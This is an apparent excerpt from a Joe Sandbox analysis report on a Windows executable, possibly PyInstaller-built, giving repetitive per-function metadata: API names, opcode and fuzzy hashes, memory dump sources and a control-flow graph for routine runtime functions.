• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction ID: 501a383dcd55afda6acac0d2fa82a9dc88a7a90b5db6c0b2e70aa9819cf72860
• Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction Fuzzy Hash: 25213071A0874281E710BF20E5152EAA262EF84760FD44035EA8D63F95DFBCD845C770

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 963 7ff7c267cfd0-7ff7c267cff5 964 7ff7c267cffb-7ff7c267cffe 963->964 965 7ff7c267d2c3 963->965 966 7ff7c267d037-7ff7c267d063 964->966 967 7ff7c267d000-7ff7c267d032 call 7ff7c267a884 964->967 968 7ff7c267d2c5-7ff7c267d2d5 965->968 970 7ff7c267d06e-7ff7c267d074 966->970 971 7ff7c267d065-7ff7c267d06c 966->971 967->968 973 7ff7c267d076-7ff7c267d07f call 7ff7c267c390 970->973 974 7ff7c267d084-7ff7c267d099 call 7ff7c268398c 970->974 971->967 971->970 973->974 978 7ff7c267d1b3-7ff7c267d1bc 974->978 979 7ff7c267d09f-7ff7c267d0a8 974->979 980 7ff7c267d1be-7ff7c267d1c4 978->980 981 7ff7c267d210-7ff7c267d235 WriteFile 978->981 979->978 982 7ff7c267d0ae-7ff7c267d0b2 979->982 985 7ff7c267d1fc-7ff7c267d20e call 7ff7c267ca88 980->985 986 7ff7c267d1c6-7ff7c267d1c9 980->986 983 7ff7c267d237-7ff7c267d23d GetLastError 981->983 984 7ff7c267d240 981->984 987 7ff7c267d0b4-7ff7c267d0bc call 7ff7c2674830 982->987 988 7ff7c267d0c3-7ff7c267d0ce 982->988 983->984 992 7ff7c267d243 984->992 1007 7ff7c267d1a0-7ff7c267d1a7 985->1007 993 7ff7c267d1cb-7ff7c267d1ce 986->993 994 7ff7c267d1e8-7ff7c267d1fa call 7ff7c267cca8 986->994 987->988 989 7ff7c267d0d0-7ff7c267d0d9 988->989 990 7ff7c267d0df-7ff7c267d0f4 GetConsoleMode 988->990 989->978 989->990 997 7ff7c267d1ac 990->997 998 7ff7c267d0fa-7ff7c267d100 990->998 1000 7ff7c267d248 992->1000 1001 7ff7c267d254-7ff7c267d25e 993->1001 1002 7ff7c267d1d4-7ff7c267d1e6 call 7ff7c267cb8c 993->1002 994->1007 997->978 1005 7ff7c267d189-7ff7c267d19b call 7ff7c267c610 998->1005 1006 7ff7c267d106-7ff7c267d109 998->1006 1008 7ff7c267d24d 1000->1008 1009 7ff7c267d2bc-7ff7c267d2c1 1001->1009 1010 7ff7c267d260-7ff7c267d265 1001->1010 1002->1007 1005->1007 1013 7ff7c267d10b-7ff7c267d10e
1006->1013 1014 7ff7c267d114-7ff7c267d122 1006->1014 1007->1000 1008->1001 1009->968 1015 7ff7c267d267-7ff7c267d26a 1010->1015 1016 7ff7c267d293-7ff7c267d29d 1010->1016 1013->1008 1013->1014 1020 7ff7c267d124 1014->1020 1021 7ff7c267d180-7ff7c267d184 1014->1021 1022 7ff7c267d26c-7ff7c267d27b 1015->1022 1023 7ff7c267d283-7ff7c267d28e call 7ff7c2674f34 1015->1023 1018 7ff7c267d2a4-7ff7c267d2b3 1016->1018 1019 7ff7c267d29f-7ff7c267d2a2 1016->1019 1018->1009 1019->965 1019->1018 1025 7ff7c267d128-7ff7c267d13f call 7ff7c2683a58 1020->1025 1021->992 1022->1023 1023->1016 1029 7ff7c267d177-7ff7c267d17d GetLastError 1025->1029 1030 7ff7c267d141-7ff7c267d14d 1025->1030 1029->1021 1031 7ff7c267d16c-7ff7c267d173 1030->1031 1032 7ff7c267d14f-7ff7c267d161 call 7ff7c2683a58 1030->1032 1031->1021 1033 7ff7c267d175 1031->1033 1032->1029 1036 7ff7c267d163-7ff7c267d16a 1032->1036 1033->1025 1036->1031
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C267CFBB), ref: 00007FF7C267D0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C267CFBB), ref: 00007FF7C267D177
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: a5b4f627d52cf9dde25abc511b57ba8bcfc515a55e6494ff97cd77da564f9d56
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: 3391C226A1865185F750BF65E4802BDABE2AB44FA8F944535DE8E73F84CFB8D442C730
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: da5c33fd950796afd40a7cb3253b1ab66723926da7e83c5d5a300bda850eb57c
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: 0F417122D1878183E650BF20A554379A361FB94B64F509335EAD816FD2DFBCA5E0C770
APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 2af43a21fc74c0dd2b4060972e7336cc958d749b6054f2b772889b8c6f5dd35c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6316A10E08A4281EA14BF65D4263B9A6A3AF457A8FC44434D5CE67FD7CEFCA404C278
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction ID: 3815c579f4f95a7c3e669a9c01136107ecc4226e76ec294592dce25d64e5178c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83D09E10B0A74682EB147F706C9907892936F49F61F941438C8DB7AB93DEACE449C330
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction ID: 617fc03ff3f9e854066d8498c3b1f98936eb5ea6fb4ea4be974dbb0a4e50e24f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E51E562A0D24286E664BE65A40067AA293AF44FB4F944734EDFC67FC5CFBCE441C630
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction ID: 9166d89e9377bcecf70a000bd8166301b1c294d74d640adc35a1f1887f2ae279
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11E261618B8181DA10AF25B804169A362BB41FF4FA40331EEBD5BBE8CFBCD001C720
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9CE
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C2682D92,?,?,?,00007FF7C2682DCF,?,?,00000000,00007FF7C2683295,?,?,?,00007FF7C26831C7), ref: 00007FF7C267A9D8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction ID: 183f5244b875de304ed6e6a6559b23ffe3681f5a0c09fc4672f00b92a5b50378
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BE04F11F1864282FF087FB2744513992626F84B60BC40034D99DA2BA2EFAC6895C330
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC36
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
• Instruction ID: d11c77f138bbff2ebabcbba1e267ad5e276477d45bdcd46752a540659b9a8099
• Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
• Instruction Fuzzy Hash: E0215011B1C64291EA947F61B45427D9293AF84FB0F984235DAAEA7BD1CFFCA845C330

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction ID: a524dea2fd5443b9b605d2abb9b29dfd3c99ee1e95fb12a2d6c3c56bcfd47aa7
• Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction Fuzzy Hash: E641B53290864187EA34BE25B54027DB3A2EB55F64F900135DACEA3B95CFADE442CB71

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
• Instruction ID: cd73bec62f283a293e7dc0aaf6d897f8531808d6072ab5a9e6e6a478bd517c0c
• Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
• Instruction Fuzzy Hash: 3621A521B0869195EE10BE2265043BAE662BF45BE4FCC5430EE8D27B86CEBDE045C634

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction ID: 2047142ebe03a124250fb7c8311e13d22de2ff8ee8584a4d41f06ab39dcd6330
• Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction Fuzzy Hash: B6318022A18A4285F7517F65A84137CA662AB80FB4FC54135EAAD23BD2DFFCE441C731

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: ceb8db3eff180ed2d92b15cf8edba3ff2dca9676efe978501d387a3f3c9e491c
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 9A217131A067818AEB24EF68D4442EC73A2EB04B28F940635D69E66FD5DFB8D544CB60

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 8f912d2385c3f88dae71ea351b3bfd1e3355e7a2a62527987b0eac9727fe491f
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: BB111A22A1864181EA61BF51A40027EE266EF85FA4FC44075EE8C67F96DFBDD840CB31

APIs
Memory Dump Source
• Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: c34f2c8fae4a3dc3146a2f8a38d8bfcd3162a30be87cbc6ee9328ec7bc1074e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82219872618641C7D761AF18E440379B6A2FB84B64F944234D6DD57BD9DF7CD400CB20
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction ID: c9456ceb4fe01632cef678d9aadbf77850c5731ad6fc897e8ae8cbd5d41f32ff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A018E61A0874180EA14FF52A901169E692AF85FF0B984631EEDC27FDADFBCE451C330
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
